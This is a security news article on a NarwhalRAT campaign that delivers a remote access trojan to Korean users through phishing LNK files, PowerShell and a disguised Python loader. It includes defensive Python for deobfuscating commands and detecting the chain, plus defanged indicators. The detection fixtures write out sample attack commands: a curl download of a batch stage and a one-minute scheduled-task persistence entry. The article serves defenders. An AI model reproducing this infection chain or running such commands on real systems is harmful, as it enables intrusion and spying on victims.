Hackers Abuse LNK Files, PowerShell, and Python Loader to Deploy NarwhalRAT
By Tushar Subhra Dutta
June 15, 2026
A sophisticated malware campaign is quietly targeting Korean users through a well-crafted chain of deception.
Threat actors are using innocent-looking shortcut files, built-in Windows tools, and a compiled Python payload to plant a remote access trojan called NarwhalRAT on victim machines. The attack stands out for how cleverly it blends into normal system activity, making it hard to catch.
The infection begins with a spear phishing email pretending to be an urgent security alert from the “Microsoft Account Team.”
The message warns the recipient about suspicious one-time password activity and directs them to open an attached advisory document. In reality, the attachment is a ZIP archive hiding a malicious LNK shortcut file, not a real document.
Analysts at Genians Security Center said in a report shared with Cyber Security News (CSN) that this threat bears strong similarities to a Python-based backdoor campaign documented in May 2026.
Researchers named the malware NarwhalRAT, drawing on the string “naverwhale” found inside its code, believed to be an attempt to masquerade as Naver Whale, a popular browser in South Korea.
The malware primarily targets Korean users, and its behavioral structure confirms this. NarwhalRAT uses “naverwhale” as its working directory name and assigns Hidden and System file attributes to the created folder to stay out of plain sight.
It also handles KakaoTalk-related window identifiers separately during data collection, strongly pointing to Korean targeting.
The threat actor operated a dual command-and-control structure using a Korean relay server alongside the pCloud API as a Dead-drop Resolver. This lets the attacker change the actual C2 address without touching the malware, and helps traffic blend with normal web activity, making detection harder.
NarwhalRAT Loader Attack
When a victim clicks the malicious LNK file, a layered infection chain immediately begins. The LNK file uses CMD environment variable substring substitution to hide the real commands, dynamically rebuilding strings like “powershell” and “curl.exe” at runtime to evade static detection.
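As an added illustration of the substring trick described above (this is example code written for this page, not the sample analysed by Genians), the following Python helper expands cmd.exe `%VAR:~start,len%` references the way the interpreter would, so an analyst can recover the real command line from an LNK argument string. The environment values and the obfuscated sample are constructed; in practice you would paste the string pulled from the shortcut's argument field.

```python
import re
from typing import Dict, Optional

# Matches %VAR%, %VAR:~start% and %VAR:~start,len% (cmd.exe substring expansion syntax).
_EXPANSION = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*)(?::~(-?\d+)(?:,(-?\d+))?)?%")

def _substring(value: str, start: int, length: Optional[int]) -> str:
    """cmd.exe semantics: a negative start counts back from the end of the value,
    a negative length drops that many characters from the end."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    end = n if length is None else (n + length if length < 0 else start + length)
    return value[start:end] if end > start else ""

def expand(command: str, env: Dict[str, str]) -> str:
    """Expand variable references as cmd.exe would (names are case-insensitive).
    References to undefined variables are left in place, which is also cmd.exe behaviour."""
    lookup = {k.lower(): v for k, v in env.items()}
    def repl(m: "re.Match[str]") -> str:
        name, start, length = m.group(1), m.group(2), m.group(3)
        if name.lower() not in lookup:
            return m.group(0)
        value = lookup[name.lower()]
        if start is None:
            return value
        return _substring(value, int(start), None if length is None else int(length))
    return _EXPANSION.sub(repl, command)

# Constructed environment using the default values of a few standard Windows variables.
DEFAULT_ENV = {
    "ComSpec": r"C:\Windows\system32\cmd.exe",
    "PUBLIC": r"C:\Users\Public",
    "ProgramData": r"C:\ProgramData",
}

# Constructed sample in the style of a substring-obfuscated LNK argument string (not the real one).
SAMPLE = "%ComSpec:~-7,3% /c start %PUBLIC:~3,4%s %NOTSET:~0,2%"

if __name__ == "__main__":
    print(expand(SAMPLE, DEFAULT_ENV))  # cmd /c start Users %NOTSET:~0,2%
```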
After deobfuscation, the LNK file launches PowerShell with execution policy bypassed and uses a copied curl.exe to download two files from the relay server.
The first is a decoy HWP document opened to keep the victim unsuspecting, while the second is a batch script named KHjWFcuS.bat that performs next-stage installation in a hidden window.
This technique of abusing built-in tools is classified as Living-off-the-Land. The batch file downloads the official Python embedded package to make the activity look like a normal software installation.
It renames pythonw.exe, the console-less Python interpreter, to usersscreen.exe so the payload runs without any visible console window. The final payload, config.cat, is disguised with a .cat extension to resemble a Windows security catalog, though it is actually compiled Python bytecode acting as a backdoor loader.
Decrypted Batch File Commands (Source – Genians)
For persistence, the malware registers a scheduled task named “MicrosoftUserInterfacePicturesUpdateTackMachine” running at one-minute intervals. This name mimics a legitimate Microsoft task, making it hard for administrators to spot during inspection.
A subsequent file, AccountConfig.cat, contains over 33,000 lines of obfuscated code with an embedded Base64-encoded payload.
NarwhalRAT Capabilities and C2 Communication
Once the payload executes in memory through fileless execution, NarwhalRAT reveals itself as a fully featured Remote Access Trojan. It first checks for virtual machine environments including VMware, VirtualBox, and Parallels Desktop to avoid sandbox analysis, a tactic typical of APT-level malware.
The RAT operates a command system built on more than 30 prefixes, giving the attacker remote control over screen capture, keylogging, microphone recording, file upload and download, USB collection, remote command execution, and C2 configuration changes.
Keystroke data is temporarily stored before being transmitted in batches, reducing real-time detection chances.
Prefix-Based Command Control System (Source – Genians)
From a C2 perspective, NarwhalRAT connects to Korean relay sites including daehoat[.]com and novel21[.]co[.]kr, while also using pCloud as a Dead-drop Resolver secondary channel. Researchers noted that EDR policies need to be strengthened to detect chained abuse based on LNK and PowerShell.
Security teams should apply behavioral rules flagging unusual scheduled task creation, unexpected curl.exe usage, and Python processes running without a visible console window.
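The three behavioural rules suggested above, turned into runnable detection logic as an added example (not code from the article or from Genians). The process-creation events are constructed to mirror the chain described in the article; the field names are an assumption and should be mapped onto your own EDR or Sysmon Event ID 1 schema.

```python
import re
from typing import Callable, Dict, List, Tuple

# Constructed process-creation events shaped after the infection chain in the article.
# Field names are an assumption; map your EDR or Sysmon Event ID 1 fields onto them.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\svchost.exe", "original_filename": "svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "command_line": "svchost.exe -k netsvcs"},
    {"image": r"C:\Users\Public\AccountPictures\curl.exe", "original_filename": "curl.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "curl.exe -o KHjWFcuS.bat http://relay.invalid/KHjWFcuS.bat"},
    {"image": r"C:\Windows\System32\schtasks.exe", "original_filename": "schtasks.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'schtasks /create /sc minute /mo 1 /tn "MicrosoftUserInterfacePicturesUpdateTackMachine"'
                     r" /tr C:\Users\Public\AccountPictures\UserInerfacePicture\usersscreen.exe"},
    {"image": r"C:\Users\Public\AccountPictures\UserInerfacePicture\usersscreen.exe",
     "original_filename": "pythonw.exe", "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": "usersscreen.exe config.cat"},
    {"image": r"C:\Windows\System32\curl.exe", "original_filename": "curl.exe",  # benign admin use
     "parent_image": r"C:\Windows\System32\cmd.exe", "command_line": "curl.exe https://example.com"},
]

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def minute_interval_task(ev: Dict[str, str]) -> bool:
    """schtasks creating a task that fires every minute, like the NarwhalRAT persistence task."""
    cl = ev["command_line"].lower()
    return (_basename(ev["image"]) == "schtasks.exe" and "/create" in cl
            and re.search(r"/sc\s+minute\s+/mo\s+1\b", cl) is not None)

def unexpected_curl(ev: Dict[str, str]) -> bool:
    """curl.exe by PE original name, but copied outside System32 or spawned by PowerShell."""
    if ev["original_filename"].lower() != "curl.exe":
        return False
    copied = not ev["image"].lower().startswith("c:\\windows\\system32\\")
    return copied or _basename(ev["parent_image"]) == "powershell.exe"

def renamed_pythonw(ev: Dict[str, str]) -> bool:
    """Console-less Python interpreter whose on-disk name no longer matches its PE original name."""
    return ev["original_filename"].lower() == "pythonw.exe" and _basename(ev["image"]) != "pythonw.exe"

RULES: Dict[str, Callable[[Dict[str, str]], bool]] = {
    "minute_interval_task": minute_interval_task, "unexpected_curl": unexpected_curl,
    "renamed_pythonw": renamed_pythonw}

def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule name, image basename) for every event that trips a rule."""
    return [(name, _basename(ev["image"])) for ev in events for name, rule in RULES.items() if rule(ev)]
```

Running `detect(SAMPLE_EVENTS)` flags the copied curl.exe, the one-minute task and the renamed pythonw.exe while leaving svchost.exe and the System32 curl.exe alone.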
Indicators of Compromise (IoCs):

| Type | Indicator | Description |
| --- | --- | --- |
| Domain | daehoat[.]com | Primary C2 Korean relay server |
| Domain | novel21[.]co[.]kr | Primary C2 Korean relay server |
| Domain | fe01[.]co[.]kr | Initial ZIP file download relay |
| Domain | webhostingkorea[.]com | Secondary relay used in LNK and BAT download stages |
| File Name | Cybersecurity Advisory Notice (Regarding One-Time Password Abuse).lnk | Malicious LNK file inside the phishing ZIP |
| File Name | Cybersecurity Advisory Notice (Regarding One-Time Password Abuse).zip | Phishing ZIP archive attachment |
| File Name | KHjWFcuS.bat | Second-stage batch file delivering the Python loader |
| File Name | config.cat | Python bytecode backdoor loader disguised as a Windows catalog file |
| File Name | AccountConfig.cat | Subsequent large Python payload with obfuscated RAT code |
| File Name | usersscreen.exe | Renamed pythonw.exe used to silently execute the payload |
| Scheduled Task | MicrosoftUserInterfacePicturesUpdateTackMachine | Persistence scheduled task running at one-minute intervals |
| File Path | C:\Users\Public\AccountPictures\UserInerfacePicture\ | Directory where payload files are deployed |
| File Path | C:\ProgramData\GoogleDriveUpdateCheck\ | Directory where AccountConfig.cat is stored |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.